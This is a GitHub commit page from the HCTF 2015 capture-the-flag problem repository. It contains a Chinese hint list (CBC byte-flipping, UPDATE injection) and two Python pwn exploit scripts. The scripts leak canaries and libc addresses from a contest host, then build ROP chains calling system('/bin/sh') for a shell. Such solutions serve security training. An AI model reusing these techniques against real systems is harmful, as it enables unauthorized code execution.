-
Notifications
You must be signed in to change notification settings - Fork 53
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge branch 'master' of https://github.com/hduisa/hctf2015-all-problems
- Loading branch information
Showing
20 changed files
with
1,206 additions
and
205 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,4 +1,4 @@ | ||
| ��Ŀ˼· | ||
| 1. ��������Ϣ�ռ����������ͣ���Ʊ�ȵȣ� | ||
| 2. CBC�ֽڷ�ת��������̨Ȩ�������� | ||
| 3. UPDATEע�루���ﳵ�� | ||
| 题目思路 | ||
| 1. 基本的信息收集能力(博客,火车票等等) | ||
| 2. 字节翻转攻击(后台权限提升) | ||
| 3. UPDATE注入(购物车) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| .DS_Store |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,73 @@ | ||
| #!/usr/bin/env python | ||
|
|
||
| from zio import * | ||
| import time | ||
|
|
||
| def calc_addr(ret): | ||
| binsh = ret + 0x15ae16 # to /bin/sh | ||
| system = ret + 0x2477b # system() function | ||
| gadget = ret + 0xc55 # 'pop rdi; ret' comeon gus | ||
| return (binsh, system, gadget) | ||
|
|
||
|
|
||
| io = zio(('120.55.86.95', 22222)) | ||
|
|
||
| ins = { | ||
| 'write_and_pass': ',[>,]', | ||
| 'read_plus_and_print': ',,+.+.', | ||
| 'bypass_canary': '.,>.,>.,>.,>.,>.,>.,>.,>', | ||
| 'get_ret': '.>.>.>.>.>.>.>.>', | ||
| 'pass8': '>>>>>>>>', | ||
| 'write8': ',>,>,>,>,>,>,>,>', | ||
| 'back8': '<<<<<<<<', | ||
| } | ||
|
|
||
| # welcome information | ||
| io.writeline("6f78f333c8d330c8726d510efc28d9a1") | ||
| io.readline() | ||
| io.readline() | ||
|
|
||
| payload = ins['write_and_pass'] | ||
| payload += ins['bypass_canary'] | ||
| payload += ins['pass8'] | ||
| payload += ins['get_ret'] | ||
| payload += ins['back8'] | ||
| payload += ins['write8'] | ||
| payload += ins['write8'] | ||
| payload += ins['write8'] | ||
|
|
||
| payload += ']' # the } of c code | ||
| payload += 'q' # finish Brainfuck code editing | ||
|
|
||
| io.write(payload) | ||
|
|
||
| time.sleep(5) | ||
|
|
||
| # Begin to bypass empty stack 0x200 + 0x8 <- a magic number | ||
| io.write('A' * 0x208 + "\x00") | ||
|
|
||
| # Begin to bypass canary | ||
| for i in range(0, 8): | ||
| a = io.read(1) | ||
| io.write(a) | ||
|
|
||
| # Begin to bypass EBP | ||
| #io.write('A' * 0x8 + "\x00") | ||
|
|
||
| # Begin to read RET | ||
| ret = l64(io.read(8)) | ||
| print "" | ||
| print hex(ret) | ||
|
|
||
| binsh, system, gadget = calc_addr(ret) | ||
| binsh_str = l64(binsh) | ||
| system_str = l64(system) | ||
| gadget_str = l64(gadget) | ||
| print hex(binsh) | ||
| print hex(system) | ||
| print hex(gadget) | ||
| io.write(gadget_str) | ||
| io.write(binsh_str) | ||
| io.write(system_str) | ||
|
|
||
| io.interact() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| from zio import * | ||
| import base64 | ||
|
|
||
| target = (('120.55.86.95',44444)) | ||
| io = zio(target, timeout=1,print_read=COLORED(REPR,'red'),print_write=COLORED(REPR,'green')) | ||
|
|
||
| io.writeline("6f78f333c8d330c8726d510efc28d9a1") | ||
| io.writeline("Y") | ||
| io.writeline("UWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrPT1Ra0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDY") | ||
| io.read_until("B"*49) | ||
| sc = "\x00"+io.read(7) | ||
|
|
||
| base = "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" | ||
|
|
||
| pop_rdi = l64(0x400e93) | ||
| addr_libc_start_main = l64(0x602048) | ||
|
|
||
| next = base64.b64encode(sc + l64(0)+pop_rdi+addr_libc_start_main+l64(0x4007c0)) | ||
|
|
||
| pd = base + next | ||
|
|
||
| payload = base64.b64encode(pd + ("A"*(120-len(pd))))+"Y" | ||
|
|
||
| io.writeline(payload) | ||
| io.read_until("B"*48) | ||
|
|
||
| start_addr = l64(io.read(6)+"\x00\x00") | ||
| system = start_addr + 0x24870 | ||
| param = start_addr + 0x15af0b | ||
|
|
||
| next = base64.b64encode(sc + l64(0)+pop_rdi+l64(param)+l64(system)) | ||
|
|
||
| pd = base + next | ||
|
|
||
| payload = base64.b64encode(pd + ("A"*(120-len(pd))))+"Y" | ||
| io.writeline(payload) | ||
| io.interact() |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Oops, something went wrong.